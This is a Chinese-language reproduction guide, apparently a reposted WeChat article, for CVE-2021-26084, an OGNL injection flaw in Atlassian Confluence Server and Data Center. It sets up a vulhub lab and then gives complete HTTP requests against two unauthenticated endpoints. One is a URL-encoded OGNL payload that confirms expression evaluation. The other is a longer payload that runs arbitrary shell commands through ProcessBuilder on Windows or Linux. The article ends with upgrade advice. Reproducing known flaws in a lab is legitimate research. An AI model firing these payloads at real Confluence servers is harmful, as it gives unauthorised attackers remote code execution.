CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

101960
文章

2022年10月30日02:04:46评论233 views字数 3023阅读10分4秒阅读模式

漏洞概述

Confluence Server和Confluence Data Center上存在一个OGNL注入漏洞，漏洞编号为CVE-2021-26084。该漏洞允许经过身份验证或在某些情况下未授权的攻击者，在Confluence Server或Confluence Data Center上执行任意代码。

影响版本

Atlassian Confluence Server/Data Center < 6.13.23
Atlassian Confluence Server/Data Center < 7.4.11
Atlassian Confluence Server/Data Center < 7.11.6
Atlassian Confluence Server/Data Center < 7.12.5
Atlassian Confluence Server/Data Center < 7.13.0

环境搭建

本次使用vulhub搭建本地测试环境进行复现：

第一步，执行以下命令，将vulhub环境拉取到本地。

git clone https://github.com/vulhub/vulhub

CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

第二步，执行以下命令，启动服务。

cd vulhub-master/confluence/CVE-2021-26084docker-compose up -d

第三步，执行docker ps命令查看容器运行状况

CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

第四步，访问http://your-ip:8090，进行confluence软件安装的配置。

选择“Trial installation”，之后会要求填写license key。点击“Get an evaluation license”，去Atlassian官方申请一个Confluence Server的测试证书。

按照默认即可，点击“Genrate License”。

将通过官网获得key输入输入框，点击“Next”。

设置数据库，这里选择PostgreSQL数据库，地址为db，数据库名称confluence，用户名密码均为postgres。

confluence安装配置完成。

选择“Manage users and groups within Confluence”，进行用户管理。

在页面底部可以看到Atlassian Confluence版本为7.4.10，符合本地漏洞版本。

CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

漏洞复现

有多个接口可以触发这个OGNL表达式注入漏洞。

1./pages/doenterpagevariables.action接口

首先，使用Burpsuite工具构造如下数据包：

POST /pages/doenterpagevariables.action HTTP/1.1Host: 192.168.150.191:8090Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 47
queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027

这个接口不需要登录即可利用，数据包发送后，即可看到233*233已被执行：

执行任意命令：

queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027

数据包发送后，即可看到“id”命令已被执行：

CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

2./pages/createpage-entervariables.action接口

使用Burpsuite工具构造如下数据包：

POST /pages/createpage-entervariables.action HTTP/1.1Host: 192.168.150.191:8090Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 47
queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027

数据包发送后，即可看到233*233已被执行：

CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

处置建议

受影响用户可根据影响范围中的信息，排查并升级到安全版本。下载链接：

https://www.atlassian.com/software/confluence/download-archives

CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

原文始发于微信公众号（第59号）：CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2021-26084：Atlassian Confluence OGNL表达式注入命令执行漏洞简析

物理安全和网络安全之间的 10 个相似之处

暗网简介：Akira Ransomware

url重定向漏洞挖掘技巧和思路

三个漏洞所导致的一个账户劫持

批量域名筛查CDN

信息安全基础：初识Public Key

SRC漏洞挖掘技巧分享-验证码漏洞挖掘

挖掘CNVD通用漏洞，重点在思路！！！

钓鱼网站+bypassuac提权

SecMet#1期理解和度量大模型的安全问题

发表评论

在线咨询

微信